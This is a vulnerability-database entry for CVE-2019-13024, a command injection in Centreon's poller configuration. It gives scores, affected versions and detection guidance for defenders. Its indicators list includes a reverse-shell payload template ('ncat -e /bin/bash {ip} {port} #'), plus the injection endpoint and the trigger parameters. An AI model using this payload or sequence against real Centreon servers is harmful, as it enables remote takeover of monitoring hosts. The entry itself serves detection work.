cbcvebase.
CVE-2019-13024
published 2019-07-01

CVE-2019-13024: Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value…

PriorityP274high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
32.16%
98.1th percentile
Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert a arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands).

Affected

1 ranges
VendorProductVersion rangeFixed in
centreoncentreon

Detection & IOCsextracted from sources · hover to see the quote

url/centreon/api/index.php?action=authenticate
path/main.get.php?p=60901
path/include/configuration/configGenerate/xml/generateFiles.php
commandncat -e /bin/bash {ip} {port} #
  • Monitor POST requests to /include/configuration/configGenerate/xml/generateFiles.php with parameters poller, debug, and generate — this is the trigger endpoint that causes shell_exec of the injected command.
  • Detect POST requests to /main.get.php?p=60901 (Poller configuration page) where the nagios_bin field contains shell metacharacters or unexpected binaries (e.g., ncat, bash, nc) — this is the injection point for the malicious command.
  • Alert on the init_script / Monitoring Engine Binary field (nagios_bin) in Centreon poller configuration containing shell operators or network tools — the value is stored in the database and later executed via shell_exec.
  • Detect POST requests to /centreon/api/index.php?action=authenticate with high frequency from a single source IP — this endpoint is targeted by the brute-force stage that precedes RCE exploitation.
  • Look for the POST body parameter combination of poller=1&debug=true&generate=true to /generateFiles.php as a reliable indicator of exploitation attempt.
  • ·Exploitation requires prior authentication to Centreon; attackers must obtain valid credentials (e.g., via brute force against the API) before injecting the payload.
  • ·The injected nagios_bin payload uses a trailing '#' comment character to suppress the remainder of the legitimate command string — detection rules should account for this obfuscation pattern.
  • ·Affected versions span Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29; detections should be scoped to these versions.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.